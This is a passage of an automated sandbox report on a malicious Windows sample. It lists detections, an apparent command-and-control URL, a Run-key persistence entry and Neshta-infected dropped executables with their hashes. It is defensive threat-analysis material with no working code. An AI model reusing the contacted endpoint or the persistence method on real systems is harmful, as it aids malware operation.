7.0.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
4.0.explorer.exe.1183f834.74.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label | Link
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
www.personalizedyardsigns.com/xkcp/ | 0% | Avira URL Cloud | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
agileintelligence.coach | 34.102.136.180 | true | false | | unknown
www.agileintelligence.coach | unknown | unknown | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== | false | Avira URL Cloud: safe | unknown
www.personalizedyardsigns.com/xkcp/ | true | Avira URL Cloud: safe | low

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | vi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown

                                        Contacted IPs


                                        Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.102.136.180 | agileintelligence.coach | United States | | 15169 | GOOGLEUS | false

                                        General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 432848
Start date: 10.06.2021
Start time: 20:52:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: vi0EwpbUht (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.troj.evad.winEXE@15/122@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 40% (good quality ratio 37.6%)
• Quality average: 75.5%
• Quality standard deviation: 29.6%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Created / dropped Files have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.50.102.62, 93.184.221.240, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.54.104.15, 20.54.7.98, 20.54.26.129, 23.57.80.111
                                        • Excluded domains from analysis (whitelisted): a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/432848/sample/vi0EwpbUht.exe

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
20:53:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
20:53:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
20:53:20 | API Interceptor | 1x Sleep call for process: elxhan.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Match: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
vOR0HQg11L.exe | Get hash | malicious | Browse |
svchost.exe | Get hash | malicious | Browse |
svchost.exe | Get hash | malicious | Browse |
2018cf61_by_Libranalysis.exe | Get hash | malicious | Browse |
41cDVt18DA.exe | Get hash | malicious | Browse |
FgTUClgDjQ.exe | Get hash | malicious | Browse |
ORDER-021406_pdf.jar | Get hash | malicious | Browse |
TT-INVI000000000.exe | Get hash | malicious | Browse |
explorer.exe | Get hash | malicious | Browse |
ITEMS_LIST.exe | Get hash | malicious | Browse |
DB0127718.exe | Get hash | malicious | Browse |
Itinerary.pdf.exe | Get hash | malicious | Browse |
Neshta virus.exe | Get hash | malicious | Browse |
54nwZp1aPg.exe | Get hash | malicious | Browse |
qpFvMReV7S.exe | Get hash | malicious | Browse |
M7oBhU5A6m.exe | Get hash | malicious | Browse |
nqVQ8G1ylC.exe | Get hash | malicious | Browse |
mtsendmail.exe | Get hash | malicious | Browse |
mtloganalyser.exe | Get hash | malicious | Browse |
contig.exe | Get hash | malicious | Browse |

Match: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
vOR0HQg11L.exe | Get hash | malicious | Browse |
svchost.exe | Get hash | malicious | Browse |
svchost.exe | Get hash | malicious | Browse |
2018cf61_by_Libranalysis.exe | Get hash | malicious | Browse |
41cDVt18DA.exe | Get hash | malicious | Browse |
FgTUClgDjQ.exe | Get hash | malicious | Browse |
ORDER-021406_pdf.jar | Get hash | malicious | Browse |
TT-INVI000000000.exe | Get hash | malicious | Browse |
explorer.exe | Get hash | malicious | Browse |
ITEMS_LIST.exe | Get hash | malicious | Browse |
DB0127718.exe | Get hash | malicious | Browse |
Itinerary.pdf.exe | Get hash | malicious | Browse |
Neshta virus.exe | Get hash | malicious | Browse |
54nwZp1aPg.exe | Get hash | malicious | Browse |
qpFvMReV7S.exe | Get hash | malicious | Browse |
M7oBhU5A6m.exe | Get hash | malicious | Browse |
nqVQ8G1ylC.exe | Get hash | malicious | Browse |
mtsendmail.exe | Get hash | malicious | Browse |
mtloganalyser.exe | Get hash | malicious | Browse |
contig.exe | Get hash | malicious | Browse |

Created / dropped Files

C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.278258254187173
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
MD5: E47F8A2ECDC2D4BFBBB6328B1391F1CC
SHA1: A633C3106A89C083014FC9F29D559B70E93D6D69
SHA-256: 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
SHA-512: 6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:
• Filename: vOR0HQg11L.exe, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious
• Filename: 41cDVt18DA.exe, Detection: malicious
• Filename: FgTUClgDjQ.exe, Detection: malicious
• Filename: ORDER-021406_pdf.jar, Detection: malicious
• Filename: TT-INVI000000000.exe, Detection: malicious
• Filename: explorer.exe, Detection: malicious
• Filename: ITEMS_LIST.exe, Detection: malicious
• Filename: DB0127718.exe, Detection: malicious
• Filename: Itinerary.pdf.exe, Detection: malicious
• Filename: Neshta virus.exe, Detection: malicious
• Filename: 54nwZp1aPg.exe, Detection: malicious
• Filename: qpFvMReV7S.exe, Detection: malicious
• Filename: M7oBhU5A6m.exe, Detection: malicious
• Filename: nqVQ8G1ylC.exe, Detection: malicious
• Filename: mtsendmail.exe, Detection: malicious
• Filename: mtloganalyser.exe, Detection: malicious
• Filename: contig.exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.3372362912074625
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
MD5: 10075707D5C79CDACFE09DEF9C6D4985
SHA1: 7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
SHA-256: 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
SHA-512: C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:
• Filename: vOR0HQg11L.exe, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: svchost.exe, Detection: malicious
• Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious
• Filename: 41cDVt18DA.exe, Detection: malicious
• Filename: FgTUClgDjQ.exe, Detection: malicious
• Filename: ORDER-021406_pdf.jar, Detection: malicious
• Filename: TT-INVI000000000.exe, Detection: malicious
• Filename: explorer.exe, Detection: malicious
• Filename: ITEMS_LIST.exe, Detection: malicious
• Filename: DB0127718.exe, Detection: malicious
• Filename: Itinerary.pdf.exe, Detection: malicious
• Filename: Neshta virus.exe, Detection: malicious
• Filename: 54nwZp1aPg.exe, Detection: malicious
• Filename: qpFvMReV7S.exe, Detection: malicious
• Filename: M7oBhU5A6m.exe, Detection: malicious
• Filename: nqVQ8G1ylC.exe, Detection: malicious
• Filename: mtsendmail.exe, Detection: malicious
• Filename: mtloganalyser.exe, Detection: malicious
• Filename: contig.exe, Detection: malicious
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.220006974675465
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
MD5: F447C4B446D5889225A9D9082145AD88
SHA1: A1A380F3D3402F243E1A213C39E969D2C24CA99E
SHA-256: C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
SHA-512: E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.356945716242827
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
MD5: DE64003856A8B74AEAF33E247AF9424B
SHA1: 912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
SHA-256: A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
SHA-512: 4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.486359083061706
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
MD5: D972E8BC4F221D69D9DF89999B74C311
SHA1: 3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
SHA-256: 8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
SHA-512: DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.5232250585402545
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
MD5: F648557D5287EC8C3677DC5B57E1C6AC
SHA1: B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
SHA-256: 647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
SHA-512: 033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.186107093668235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.667436230875162
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
